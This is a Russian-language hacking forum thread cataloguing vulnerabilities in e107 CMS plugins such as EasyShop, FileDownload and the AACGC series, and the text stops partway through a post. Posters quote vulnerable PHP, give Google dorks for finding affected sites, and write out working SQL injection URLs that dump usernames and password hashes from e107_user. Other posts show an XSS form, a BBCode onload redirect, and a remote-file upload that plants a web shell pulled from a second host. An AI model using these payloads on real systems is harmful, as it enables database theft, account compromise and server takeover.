[ Обзор уязвимостей e107 cms ]

Discussion in 'Веб-уязвимости' started by ettee, 16 Aug 2007.

  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Не знаю было или не, но пишу:

    скачал Plugins > E-Commerce > Notice Board на plugins.e107.org [скачать]
    Author sunout
    Date 13:10 14-May-10

    дорк: inurl:e107_plugins/nboard

    e107_plugins/nboard/viewads.php
    PHP:
    require_once("../../class2.php");
    require_once(
    e_HANDLER."form_handler.php");
    require_once(
    e_HANDLER."userclass_class.php");
    @include_once(
    e_PLUGIN."nboard/languages/".e_LANGUAGE.".php");

    $ns = new e107table;
    require_once(
    HEADERF);
    require_once(
    "classmen.php");
    $uspage e_BASE;
        
    $scat $_GET['scat'];
        
    $act $_GET["act"];
    //==================================Debug=======================================
    if ($act == "det"){
        
    $text .="<table>";
        
    $sql -> db_Select("nb_gnl""*""gnl_id='$scat' ");
        while(
    $row $sql -> db_Fetch()){
            
    $gnl_id $row['gnl_id'];
            
    $gnl_name $row['gnl_name'];
            
    $gnl_city $row['gnl_city'];
            
    $gnl_picbig=$row['gnl_picbig'];
        
    $gnl_small $row['gnl_picsmall'];
                
    $gnl_detail $row['gnl_detail'];
            
    $gnl_user $row['gnl_user'];
            
    $gnl_phone $row['gnl_phone'];
            
    $gnl_email $row['gnl_email'];
            
    $gnl_date $row['gnl_date'];
            
    $gnl_price $row['gnl_price'];
            
    $gnl_kikoz $row['gnl_kikoz'];

    /*...*/
    ////вывод где то там
    }
    $text .="</table>";
    $caption NB_NAME_6;
    $ns -> tablerender($caption$text);
    require_once(
    FOOTERF);

    екплоенг:
    Code:
    http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+
    условие mg=0ff


    e107_plugins/nboard/nboard.php
    PHP:
    /*...*/
    $cat $_GET['cat'];
        
    $scat $_GET['scat'];
        
    $page $_GET["page"]
    /*...*/
    //====================== all_select ============================//
    function sql_cat($onpage$page$cat$table){
            
    $begin $page*$onpage// откуда начинать
        
    $sql "SELECT * FROM ".$table." WHERE gnl_scatid in (select subcat_id from ".MPREFIX."nb_subcat where subcat_catid=$cat) ORDER BY gnl_id DESC LIMIT ".$begin.", ".$onpage;
        
    $result_cat mysql_query($sql) or die(mysql_error());
        return 
    $result_cat;
    echo 
    $result_cat;
    }
    /*...*/
    $onpage 40// записей на страницу
        
    $table "".MPREFIX."nb_gnl"// из какой таблицы
        
    $page page(); // определяем страницу
        
    $result sql_result($onpage$page$table$gnl_pigbig);
        
    $result_cat sql_cat($onpage$page$cat$table$gnl_pigbig);
        
    $result_scat sql_scat($onpage$page$scat$table$gnl_pigbig);
    /*...*/
    Теперь никаких условий должно быть, кстате там подзапрос, тоесть со скобкой вылазить надо.
    Еще есть одна SQL inj в файле, но mg=off надо.

    Запарилсо добиватца вывода и кнопать => Если нет значения в nb_cat, то уязвимость неексплуатируемая.
    У кого есть желание смотрите.

    короче через ошибку:
    Code:
    http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    1

    pXSS
    nlstart uploaded EasyShop v1.54 26Aug10

    скачать

    http://[host]/[path]/e107_plugins/easyshop/easyshop_sql.php - стурктура БД плагина

    /e107_plugins/easyshop/easyshop_basket.php
    PHP:
    /*...*/
    // Filling basket from product  = P; return to product overview
    if ($_POST['fill_basket'] == 'C' or $_POST['fill_basket'] == 'P') {
        
    // refresh_cart(); // IPN addition // might screw up the session variables
        // IPN addition - sets two variables to help keep coding neat later on
        
    isset($_POST['item_id'])? $action_id=$_POST['item_id']: NULL;
        isset(
    $_SESSION['shopping_cart'][$action_id]['item_track_stock'])
            && (
    $_SESSION['shopping_cart'][$action_id]['quantity']) < ($_SESSION['shopping_cart'][$action_id]['item_instock'])?
                
    $allow_add TRUE:
                
    $allow_add NULL;
        isset(
    $_SESSION['shopping_cart'][$action_id]['item_track_stock'])?
                
    $track_stock TRUE:
                
    $track_stock NULL;

        
    // Fill the basket with selected product
        
    if (!array_key_exists($_POST['item_id'], $_SESSION['shopping_cart'])) {
          
    // Key for item id does not exists; item needs to be added to the array
          
    $_SESSION['shopping_cart'][$_POST['item_id']] = array('item_name'=>$_POST['item_name'], 'quantity'=>$_POST['item_qty'], 'item_price'=>$_POST['item_price'], 'sku_number'=>$_POST['sku_number'], 'shipping'=>$_POST['shipping'], 'shipping2'=>$_POST['shipping2'], 'handling'=>$_POST['handling'], 'db_id'=> $_POST['db_id']);
          
    // Handling costs are calculated once per each basket
          
    $_SESSION['sc_total']['handling'] += (double)$_POST['handling'];
            
    // IPN addition - check  to see if we're tracking stock, if so put stock amount into SESSION ARRAY
             
    if ($_POST['item_track_stock'] == 2){
                
    $_SESSION['shopping_cart'][$_POST['item_id']]['item_instock'] = $_POST['item_instock'];
                
    $_SESSION['shopping_cart'][$_POST['item_id']]['item_track_stock'] = $_POST['item_track_stock'];
             }
        }
        else if (!isset(
    $track_stock) || isset($allow_add)){
          
    // IPN addition check quantity against item_instock
          // Key for item id does exist; only quantity needs to raised
          
    $_SESSION['shopping_cart'][$_POST['item_id']]['quantity'] += $_POST['item_qty'];
        }

        if (!isset(
    $track_stock) || isset($allow_add)){  // IPN addition - don't increment if quantity is at max stock level
            // Fill the sc_total array
            
    $previous_nr_of_items $_SESSION['shopping_cart']['item_id']['quantity']; // Fix bug #88
            
    $_SESSION['sc_total']['items'] += $_POST['item_qty'];
            
    $_SESSION['sc_total']['sum'] += (double)$_POST['item_price'] * $_POST['item_qty'];
            
    // Extra shippings costs are conditioned (only calculate for first product)
            
    if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) >= and $previous_nr_of_items == 0) { // Fix bug #81
              
    $_SESSION['sc_total']['shipping'] += (double)$_POST['shipping'];
            }
            
    // PayPal charges shipping2 costs for all items above quantity of 2
            
    if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) > 1) {
                if (
    $previous_nr_of_items == 0) {
                    
    $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * ($_POST['item_qty']-1);
                }
                else {
                    
    $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * $_POST['item_qty'];
                }
            }
        }

        
    // Close the session (before a location redirect: otherwise the variables may not display correctly)
        
    session_write_close();
        
    // Return to original url
        
    header("Location: ".$_POST['return_url']);
        exit();
    }
    HTML:
    <form name="" action="http://e107/e107_plugins/easyshop/easyshop_basket.php" method="post">
    <input name="fill_basket" type="hidden" value="C">
    <input name="return_url" type="hidden" value="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+">
    <input type="submit" value="Send">
    </form>
    зы 5 минут поиска!
     
    #62 Strilo4ka, 31 Aug 2010
    Last edited: 31 Aug 2010
    1 person likes this.
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    FileDownload Advanced v2.0 by The Hunter
    скачать
    гугл- inurl:e107_plugins/FileDownload

    http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php
    PHP:
    require_once("config.php");
    require_once(
    "functions.php");

    if (
    $_GET["dir"])
        
    $dir $_GET["dir"];
    else
        
    $dir $_POST["dir"];

    if (
    $_POST["numfiles"])
        
    $numfiles $_POST["numfiles"];
    else
        
    $numfiles 4;

    if ((isset(
    $_POST["hide"])) and (isset($dir)))
    {
        for (
    $x 1$_POST["file".$x]; $x++)
        {
            
    $file $_POST["file".$x];
            
    $copy copy($file,$dir."/".getFileName($file));
            
    $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" getFileName($file) . " successfully.</td></tr>";
        }
    }
    ./config.php
    PHP:
    //$expPrefPass='';
    $expBaseDir='../';
    $expSortOrder=0;
    $expDisplaySearch...
    Как видно первая строка закоментирована.
    ...
    ./functions
    PHP:
    require_once("config.php");

    if (isset(
    $_COOKIE["phpFileDownload_login"]))
        if (
    $_COOKIE["phpFileDownload_login"] != $expPrefPass)
            
    header ("location: login.php");...
    И посему нет никакой переадресации если куки не устанавливать. ):
    ...function 
    getFileName ($file)
    {
        
    $strlen strlen($file); 
        
    $retfile "";
        while (
    $strlen 0)
        {
            
    $_g substr(substr($file$strlenstrlen($file)), 01);
            if ((
    $_g == "\\") or ($_g == "/"))
                break;

            
    $retfile substr($file$strlenstrlen($file)); 
            
    $strlen $strlen-1
        } 
        return 
    $retfile;
    }...
    Результат:
    Заливаем на хостинг шелл или с своего розшареного.

    Посылаем запрос:
    <form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post>
    <input type=hidden name=hide value=0><br>
    <input type=text name="file1" value='http://[host2]/[path]/shell.php'><br>
    <input type=text name=dir value=log><br>
    <input type=submit>
    </form>

    Наш шелл:
    http://[host]/[path]/FileDownload/filedownload/log/shell.php

    ps др. способы заливки

    TiltViewer v1.2 by The_Death_Raw
    Если уставновлен,то повезло. скачать

    Заливаем шельца!
    гугл- inurl:e107_plugins/tiltviewer
    http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php
    PHP:
    ...// fonction upload
    foreach ($_FILES["filez"]["error"] as $key => $error) {
        if (
    $error == UPLOAD_ERR_OK) {
            
    $tmp_name $_FILES["filez"]["tmp_name"][$key];
            
    $name $_FILES["filez"]["name"][$key];
            
    move_uploaded_file($tmp_name"./uploads/$name");
            
           
    Header("Location: ".$_SERVER['PHP_SELF'].""); 
     
        }...
    Выбираем наш шелл и Send the files
    http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php

    ps заходил под админом и тогда лил, хоть и нужны права но мб пригодиться ;)

    др. способы заливки

    AACGC Hall of Shame v1.6 by ~M@CH!N3~
    07:27 02-Apr-10
    скачать
    Blind SQL inj
    гугл- inurl:e107_plugins/aacgc_hos
    [path]/e107_plugins/aacgc_hos/HOS_Details.php
    PHP:
    ...require_once("../../class2.php");
    require_once(
    HEADERF);
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }


    //------------------------------------------------------------------------------------------------------------

    $text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>";


    $sql->db_Select("aacgc_hos""*""WHERE hos_id = $sub_action","");
    $row $sql->db_Fetch();...
    плюс - никаких условий.
    минус - надо знать hos_id.

    Результат:
    Пусть hos_id=1 и 5 ветка
    http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент!
    http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента!

    ps с "+" контент не выводился (если в гет пихать)​
     
    #63 Strilo4ka, 3 Sep 2010
    Last edited: 3 Sep 2010
    2 people like this.
  4. kori256

    kori256 Member

    Joined:
    7 Feb 2009
    Messages:
    49
    Likes Received:
    33
    Reputations:
    6
    Проверял только на 0.7.22 и 0.7.23 Не совсем уязвимость, но можно запороть любой коментарий, будь то на форуме, лс или коментарий к пользователю и к новости.

    достаточно вставить

    Code:
    [img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img] 
    0x687474703a2f2f676f6f676c652e7275 - это захекшеный гугл, вставить можно любое

    ©by sw3n
     
    #64 kori256, 3 Sep 2010
    Last edited: 3 Sep 2010
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    AACGC Friend System v.1.1 - плагин e107
    скачать с plugins.e107.org
    inurl:/e107_plugins/aacgc_friendsys/

    Path disclosure
    display_errors = on

    PoC
    Code:
    http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php
    http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php
    SQL inj
    magic_quotes_gpc = Off, нужно быть авторизированым.

    /e107_plugins/aacgc_friendsy/Friend_Requests.php
    PHP:
    /*...*/
    if (USER){

    if (
    $pref['fl_enable_gold'] == "1")
    {
    $gold_obj = new gold();}
    /*...*/
    if (isset($_POST['accept_user'])){

    $newuser $_POST['user_id'];
    $newfriend $_POST['user_friends'];
    /*...*/
    $sql->db_Insert("aacgc_friend_sys""NULL, '".$newuser."', '".$newfriend."'") or die(mysql_error());
    /*...*/
    /e107_handlers/mysql_class.php
    PHP:
    /*...*/
    function db_Insert($table$arg$debug FALSE$log_type ''$log_remark '') {
            
    $table $this->db_IsLang($table);
            
    $this->mySQLcurTable $table;
            if(
    is_array($arg))
            {
                
    $keyList"`".implode("`,`"array_keys($arg))."`";
                
    $valList"'".implode("','"$arg)."'";
                
    $query "INSERT INTO `".MPREFIX."{$table}` ({$keyList}) VALUES ({$valList})";
            }
            else
            {
                
    $query 'INSERT INTO '.MPREFIX."{$table} VALUES ({$arg})";
            }

            if(!
    $this->mySQLaccess)
            {
                global 
    $db_ConnectionID;
                
    $this->mySQLaccess $db_ConnectionID;
            }


            if (
    $result $this->mySQLresult $this->db_Query($queryNULL'db_Insert'$debug$log_type$log_remark )) {
                
    $tmp mysql_insert_id($this->mySQLaccess);
                return (
    $tmp) ? $tmp TRUE// return true even if table doesn't have auto-increment.
            
    } else {
                
    $this->dbError("db_Insert ($query)");
                return 
    FALSE;
            }
        }
    /*...*/
    PoC
    Code:
    <form action=http://[host]/[path]/e107_plugins/aacgc_friendsys/Friend_Requests.php method=post>
    <input name=user_id type=text value="1',(select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(':',user_loginname, user_password) from e107_user limit 0,1 ),floor(rand(0)*2))))#">
    <input type=submit name=accept_user value=Send>
    </form>
    SQL inj
    надо быть авторизированым.

    /e107_plugins/aacgc_friendsys/AddMe.php
    Code:
    require_once("../../class2.php");
    require_once(HEADERF);
    if (e_QUERY) {
            $tmp = explode('.', e_QUERY);
            $action = $tmp[0];
            $sub_action = $tmp[1];
            $id = $tmp[2];
            unset($tmp);
    }
    
    if (USER){
    
    $sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."","");
    $row = $sql->db_Fetch();
    
    
    $sql2 = new db;
    $sql2->db_Select("user", "*", "WHERE user_id = $sub_action ","");
    $row2 = $sql2->db_Fetch();
    print_r($row2);
    
    //----------------------------------------------
    /*...*/
    $text .= "<center>
    <form method='POST' action='AddMe.php?det.".$row2['user_id']."'>
    <table style='' class='indent'><tr>
    <td>
    <input type='hidden' name='user_friends_request' value='".USERID."'>
    <input type='hidden' name='user_id' value='".$row2['user_id']."'>
    </td>
    </tr>
    <tr>
    <td>
    <i>Are You Sure You Want To Add</i> <b>".$row2['user_name']."</b> <i>To Your Friends List?</i>
    ";
    /*...*/
    
    Poc:
    Code:
    http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
     
    #65 Strilo4ka, 21 Oct 2010
    Last edited: 21 Oct 2010
    4 people like this.
  6. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Wish List
    http://plugins.e107.org/

    SQL Injection:
    /News_Details.php
    PHP:
    ...
    $sql ->db_Select("aacgc_pnews""*""WHERE news_id = ".$sub_action."","");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1
    
    /News.php
    PHP:
    ...
    $sql ->db_Select("aacgc_pnews_cat""*""WHERE news_cat_id = ".$sub_action."","");
    $row $sql ->db_Fetch();
    $newscatid $row['news_cat_id'];
    ...
    $sql2->mySQLresult = @mysql_query("select * from ".MPREFIX."aacgc_pnews where news_cat=".$newscatid." ORDER BY news_date DESC;");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user
    
    Путь:
    http://e107/e107_plugins/aacgc_pnews/e_latest.php
    http://e107/e107_plugins/aacgc_pnews/e_status.php
    http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php

    Дорк:inurl:e107_plugins/aacgc_pnews/
    Если боян - извиняйте.
     
    #66 Фараон, 10 Dec 2010
    Last edited: 10 Dec 2010
    1 person likes this.
  7. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Arcade Addons V3.3

    SQL Injection:
    /Category.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);}
    ...
    $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action");
    ...
    Пример:
    Code:
    http://e107games.net/e107_plugins/aacgc_arcade_addins/Category.php?det.-1%20union%20select%201,2,3,4,5,6--
    
    Путь:
    http://e107/e107_plugins/aacgc_arcade_addins/Alternate_Arcade_Main_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Champ_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Favorites_menu.php
    http://e107/e107_plugins/aacgc_arcade_addins/Challenge_Champ_menu.php
    etc...

    Дорк:inurl:e107_plugins/aacgc_arcade_addins/
    Если боян - извиняйте.
     
    1 person likes this.
  8. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC CMMS v1.2

    Необохдимы права администратора, SQL Injection:
    /admin_edit_cat.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $id $tmp[1];
            unset(
    $tmp);
    }
    ...
                    
    $sql->db_Select("aacgc_bt_cat""*""cat_id = $id");
    ...
    $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_btracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    SQL Injection:
    /Bracket_Details.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
                    
    $sql->db_Select("aacgc_bt_cat""*""WHERE cat_id=$sub_action","");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_btracker/Bracket_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/aacgc_btracker/admin_menu.php

    Дорк:inurl:e107_plugins/aacgc_btracker/
     
    #68 Фараон, 10 Dec 2010
    Last edited: 11 Dec 2010
    1 person likes this.
  9. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Tracker V1.2

    Необохдимы права администратора, SQL Injection:
    /admin_edit_cat.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $id $tmp[1];
            unset(
    $tmp);
    }
    ...
                    
    $sql->db_Select("aacgc_tracker_cat""track_cat_id, track_cat_name""track_cat_id = $id");

    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user--
    
    SQL Injection:
    /Tracker.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql->db_Select("aacgc_tracker""*""WHERE track_cat=$sub_action","");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
    
    SQL Injection:
    /Tracker_Details.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql3->db_Select("aacgc_tracker""*""WHERE track_id=$sub_action""");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user--
    

    Путь:
    http://e107/e107_plugins/aacgc_tracker/admin_menu.php

    Дорк:inurl:e107_plugins/aacgc_tracker/
     
    2 people like this.
  10. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC MIA List V1.3

    Необохдимы права администратора, SQL Injection:
    /admin_edit.php
    PHP:
    ...
    if (
    $action == "edit")
    {
            
    $sql->db_Select("aacgc_mialist""*""WHERE mia_id=$id","");
            
    $row $sql->db_Fetch();
            
    $sql2 = new db;
            
    $sql2->db_Select("user""*""WHERE user_id=".$row['mia_user']."","");
            
    $row2 $sql2->db_Fetch();
            
    $sql3 = new db;
            
    $sql3->db_Select("user""*");
            
    $rows $sql3->db_Rows();
            for (
    $i=0$i $rows$i++) {
            
    $option $sql3->db_Fetch();
            
    $options .= "<option name='mia_user' value='".$option['user_id']."'>".$option['user_name']."</option>";}
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_mialist/admin_edit.php?edit.-1%20union%20select%20concat_ws(0x3a,user_name,user_password),2222,3333%20from%20e107_user%20limit%200,1--
    
    Вывод внизу в исходнике
    Путь:
    http://e107/e107_plugins/aacgc_mialist/MIA_List_menu.php
    http://e107/e107_plugins/aacgc_mialist/admin_menu.php

    Дорк:inurl:e107_plugins/aacgc_mialist/
     
    1 person likes this.
  11. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Trophy Room V1.5

    Необохдимы права администратора, SQL Injection:
    /admin_edit_event.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $id $tmp[1];
            unset(
    $tmp);
    }
    ...
    if (
    $action == "edit")
    {
                    
    $sql->db_Select("aacgc_trophy_room""*""event_id = $id");
                    
    $row $sql->db_Fetch();
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
    
    SQL Injection:
    /Event_Details.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    }
    ...
    $sql->db_Select("aacgc_trophy_room""*""WHERE event_id = $sub_action","");
    $row $sql->db_Fetch();
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php

    Дорк:inurl:e107_plugins/aacgc_trophy_room/
     
    #71 Фараон, 11 Dec 2010
    Last edited: 13 Dec 2010
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Clan Listing V2.0

    Необохдимы права администратора, SQL Injection:
    /admin_edit.php
    PHP:
    ...
    $sql->db_Select("clan_listing""*""ORDER BY clan_id ASC","");
            while(
    $row $sql->db_Fetch()){
            
    $sql2->db_Select("clan_listing_cat""*""WHERE clan_cat_id=".$row['clan_cat']."","");

    ...
    Пример:
    Code:
    http://e107/e107_plugins/clan_listing/admin_edit.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--
    
    SQL Injection:
    /Clans.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql->db_Select("clan_listing_cat""*""WHERE clan_cat_id=$sub_action","");
    $catname $sql->db_Fetch();
    ...
    Пример:
    Code:
    http://e107/e107_plugins/clan_listing/Clans.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/clan_listing/admin_menu.php

    Дорк:inurl:e107_plugins/clan_listing/
     
    1 person likes this.
  13. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Product Listing V1.4

    SQL Injection:
    /Product_Sub_Categories.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }

    ...
    $sql->db_Select("product_listing_subcat""*""WHERE product_cat=$sub_action ORDER BY product_subcat_name ASC","");    
    while(
    $row $sql->db_Fetch()){
    ...
    Пример:
    Code:
    http://e107/e107_plugins/product_listing/Product_Sub_Categories.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /Products.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql->db_Select("product_listing""*""WHERE product_cat=$sub_action","");    
    ...
    Пример:
    Code:
    http://e107/e107_plugins/product_listing/Products.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/product_listing/Product_Listing_menu.php
    http://e107/e107_plugins/product_listing/admin_menu.php


    Дорк:inurl:e107_plugins/product_listing/
     
  14. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Item List V1.4

    SQL Injection:
    /Item_List.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    if (
    $action == "det"){

    $sql2->db_Select("aacgc_itemlist_cat""*""WHERE item_cat_id=$sub_action","");    
    $row2 $sql2->db_Fetch();
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_itemlist/Item_List.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /Item_SubCategories.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    if (
    $action == "det"){

    $sql2->db_Select("aacgc_itemlist_subcat""*""WHERE item_subcat_id=$sub_action","");       
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_itemlist/Item_SubCategories.php?det.-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4%20from%20e107_user--
    
    Путь:
    http://e107/e107_plugins/aacgc_itemlist/admin_menu.php
    http://e107/e107_plugins/aacgc_itemlist/Recent_Items_menu.php
    http://e107/e107_plugins/aacgc_itemlist/Random_Item_menu.php

    Дорк:inurl:e107_plugins/aacgc_itemlist/
     
    1 person likes this.
  15. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    AACGC Public News V1.4

    SQL Injection:
    /News.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql ->db_Select("aacgc_pnews_cat""*""WHERE news_cat_id = ".$sub_action."","");
    ...
    Пример:
    Code:
    http://e107/e107_plugins/aacgc_pnews/News.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--
    
    SQL Injection:
    /News_Details.php
    PHP:
    ...
    if (
    e_QUERY) {
            
    $tmp explode('.'e_QUERY);
            
    $action $tmp[0];
            
    $sub_action $tmp[1];
            
    $id $tmp[2];
            unset(
    $tmp);
    }
    ...
    $sql ->db_Select("aacgc_pnews""*""WHERE news_id = ".$sub_action."","");
    $row $sql ->db_Fetch();
    ...
    Пример:
    Code:
